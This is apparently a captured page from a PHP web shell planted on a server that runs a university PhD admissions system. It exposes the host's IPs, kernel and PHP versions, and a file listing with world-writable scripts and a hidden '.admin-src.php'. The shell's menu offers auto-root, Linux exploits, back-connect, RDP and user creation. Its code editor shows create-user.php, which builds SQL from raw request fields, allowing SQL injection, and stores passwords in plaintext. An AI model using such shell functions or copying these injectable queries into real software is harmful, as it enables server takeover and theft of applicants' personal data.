Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 18.189.182.15
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
phdadm /
admin-src /
[ HOME SHELL ]
Name
Size
Permission
Action
.admin-src.php
3.61
KB
-rw-r--r--
AdmissionListReportExcel.php
13.85
KB
-rwxrwxrwx
ApplicationFeeSumExcel1.php
7.43
KB
-rwxrwxrwx
ApplicationFeeSummary.php
10.14
KB
-rwxrwxrwx
ApplicationFeeSummaryExcel.php
2.93
KB
-rwxrwxrwx
ApplicationReport.php
10.32
KB
-rwxrwxrwx
ApplicationReport_acu.php
4
KB
-rw-rw-r--
ApplicationReport_acu_pdf.php
23.25
KB
-rw-rw-r--
Applicationfeereport.php
8.72
KB
-rwxrwxrwx
Collegewise_SeatAllotedList.ph...
11.13
KB
-rwxrwxrwx
Degreewise_Adm_Fee_Collected.p...
7.66
KB
-rwxrwxrwx
Degreewise_SeatAllotedList.php
12.07
KB
-rwxrwxrwx
Degreewise_SeatAllotedList_all...
11.18
KB
-rwxrwxrwx
Degreewise_SeatAllotedList_cre...
19.46
KB
-rwxrwxrwx
Degreewise_SeatAllotedList_cre...
17.58
KB
-rwxrwxrwx
Degreewise_SeatAllotedList_cre...
17.83
KB
-rwxrwxrwx
Degreewise_SeatAllotedList_fin...
17.09
KB
-rwxrwxrwx
PrintDocumentVerification.php
28.13
KB
-rwxrwxrwx
SeatMatrixReport.php
24.02
KB
-rwxrwxrwx
admList.php
1.11
KB
-rwxrwxrwx
admconfirmation.php
4.43
KB
-rwxrwxrwx
admissionFeeSummaryReportExcel...
9.64
KB
-rwxrwxrwx
admissionfeedetails.php
1.57
KB
-rwxrwxrwx
admissionfeereport.php
11.59
KB
-rwxrwxrwx
admissionstatusreport.php
12.62
KB
-rwxrwxrwx
admorder_ru.php
4.4
KB
-rwxrwxrwx
applicationFormReportBank.php
11.91
KB
-rwxrwxrwx
applicationview.php
4.11
KB
-rwxrwxrwx
applicationview_acu.php
2.22
KB
-rw-rw-r--
changepasswordadmin.php
1.12
KB
-rwxrwxrwx
collegedegree.php
1.92
KB
-rwxrwxrwx
collegedetails.php
2.49
KB
-rwxrwxrwx
create-user.php
4.66
KB
-rwxrwxrwx
documentverification.php
15.69
KB
-rwxrwxrwx
dudseatallot.php
6.06
KB
-rwxrwxrwx
getnumword.php
9.1
KB
-rwxrwxrwx
loadadmhostelfeedetails.php
2.09
KB
-rwxrwxrwx
loadhostelfeedetails.php
4.52
KB
-rwxrwxrwx
presealallot.php
7.58
KB
-rwxrwxrwx
provisionsellist.php
1.58
KB
-rwxrwxrwx
provisionsellistReport.php
13.78
KB
-rwxrwxrwx
provisionsellistReportDownload...
14.94
KB
-rwxrwxrwx
report_merit_list.php
6.82
KB
-rwxrwxrwx
rostertable.php
490
B
-rwxrwxrwx
saveApplication.php
19.13
KB
-rwxrwxrwx
savevacantseats.php
2.57
KB
-rwxrwxrwx
seat_alloted_seatmatrix.php
11.34
KB
-rwxrwxrwx
seatmatrix.php
8.57
KB
-rwxrwxrwx
signin.php
846
B
-rwxrwxrwx
viewpresealallot2.php
8.17
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : create-user.php
<?php function loadDegree($aobj_context) { $aobj_context->mobj_db->SetFetchMode(ADODB_FETCH_ASSOC); $query1 = "select * from entdeg"; $result1 = $aobj_context->mobj_db->GetAll($query1); // var_dump($result1); if($result1) { echo $aobj_context->mobj_output->ToJSONEnvelope($result1,0,"success"); } else { $arr = "Some Failure as occured"; echo $aobj_context->mobj_output->ToJSONEnvelope($arr,-1,"error"); } } function createUser($aobj_context){ $aobj_context->mobj_db->SetFetchMode(ADODB_FETCH_ASSOC); $json = new Services_JSON(); $usrname = stripslashes($aobj_context->mobj_data["usrname"]); $password = stripslashes($aobj_context->mobj_data["password"]); $mob = stripslashes($aobj_context->mobj_data["mob"]); $name = stripslashes($aobj_context->mobj_data["name"]); $checkedValue = stripslashes($aobj_context->mobj_data["checkedValue"]); $screen = stripslashes($aobj_context->mobj_data["screen"]); if($screen == 'add') { $query = "INSERT INTO `masuser` (`fusername`, `fmobileno`, `fname`, `fpasswd`, `fdegree`, `fusertype`, `fdeggrp`) VALUES ('{$usrname}', '{$mob}', '{$name}', '{$password}', '{$checkedValue}', 'usr','PG')"; $rst = $aobj_context->mobj_db->Execute($query); }else if($screen == 'edit') { $query = "update masuser set fusername = '{$usrname}', fname = '{$name}', fdegree = '{$checkedValue}*', fdeggrp = 'PG' where fmobileno = '{$mob}'"; $rst = $aobj_context->mobj_db->Execute($query); } if($rst) { $success_msg= "Updated Successfully"; echo $aobj_context->mobj_output->ToJSONEnvelope($success_msg,0,"success"); } else { $error_msg = "Some Failure as occured"; echo $aobj_context->mobj_output->ToJSONEnvelope($error_msg,-1,"error"); } } function loadusers($aobj_context) { $aobj_context->mobj_db->SetFetchMode(ADODB_FETCH_ASSOC); $query1 = "select fusername,ifnull(fmobileno,' - ') as mob, ifnull(fname,' - ') as name, if(fusertype = 'adm','Admin','User') as user_type, ifnull(fdegree,'') as fdegree, ifnull(fdeggrp,'') as fdeggrp from masuser where ifnull(fdeleted,'') <> 'T' and ifnull(fmobileno,'') <> ''"; $result1 = $aobj_context->mobj_db->GetAll($query1); if($result1) { echo $aobj_context->mobj_output->ToJSONEnvelope($result1,0,"success"); } else { $arr = "Some Failure as occured"; echo $aobj_context->mobj_output->ToJSONEnvelope($arr,-1,"error"); } } function loadDegGrp($aobj_context) { $aobj_context->mobj_db->SetFetchMode(ADODB_FETCH_ASSOC); $query1 = "select distinct fdeggrp from degree where ifnull(fdeggrp,'') <> ''"; $result1 = $aobj_context->mobj_db->GetAll($query1); if($result1) { echo $aobj_context->mobj_output->ToJSONEnvelope($result1,0,"success"); } else { $arr = "Some Failure as occured"; echo $aobj_context->mobj_output->ToJSONEnvelope($arr,-1,"error"); } } function loadDegreeg($aobj_context) { $aobj_context->mobj_db->SetFetchMode(ADODB_FETCH_ASSOC); $query1 = "select * from entdeg"; $result1 = $aobj_context->mobj_db->GetAll($query1); if($result1) { echo $aobj_context->mobj_output->ToJSONEnvelope($result1,0,"success"); } else { $arr = "Some Failure as occured"; echo $aobj_context->mobj_output->ToJSONEnvelope($arr,-1,"error"); } } function loadDegree1($aobj_context) { $aobj_context->mobj_db->SetFetchMode(ADODB_FETCH_ASSOC); $query1 = "select distinct `FPROGCODE`, fdescpn from degree group by FPROGCODE order by fdegree"; $result1 = $aobj_context->mobj_db->GetAll($query1); if($result1) { echo $aobj_context->mobj_output->ToJSONEnvelope($result1,0,"success"); } else { $arr = "Some Failure as occured"; echo $aobj_context->mobj_output->ToJSONEnvelope($arr,-1,"error"); } } function deleteUser($aobj_context) { $aobj_context->mobj_db->SetFetchMode(ADODB_FETCH_ASSOC); $mob = stripslashes($aobj_context->mobj_data["mob"]); $query = "update masuser set fdeleted = 'T' where fmobileno = '{$mob}'"; $result1 = $aobj_context->mobj_db->Execute($query); if($result1) { echo $aobj_context->mobj_output->ToJSONEnvelope($result1,0,"success"); } else { $arr = "Some Failure as occured"; echo $aobj_context->mobj_output->ToJSONEnvelope($arr,-1,"error"); } } function logout($aobj_context) { $aobj_context->mobj_db->SetFetchMode(ADODB_FETCH_ASSOC); $_SESSION = []; session_unset(); session_destroy(); session_write_close(); setcookie(session_name(),'',0,'/'); session_regenerate_id(true); if(!isset($_SESSION['USERNAME'])) { $arr = "Logged out successfully"; echo $aobj_context->mobj_output->ToJSONEnvelope($arr,0,"success"); } else { $arr = "Some Failure as occured"; echo $aobj_context->mobj_output->ToJSONEnvelope($arr,-1,"error"); } }
Close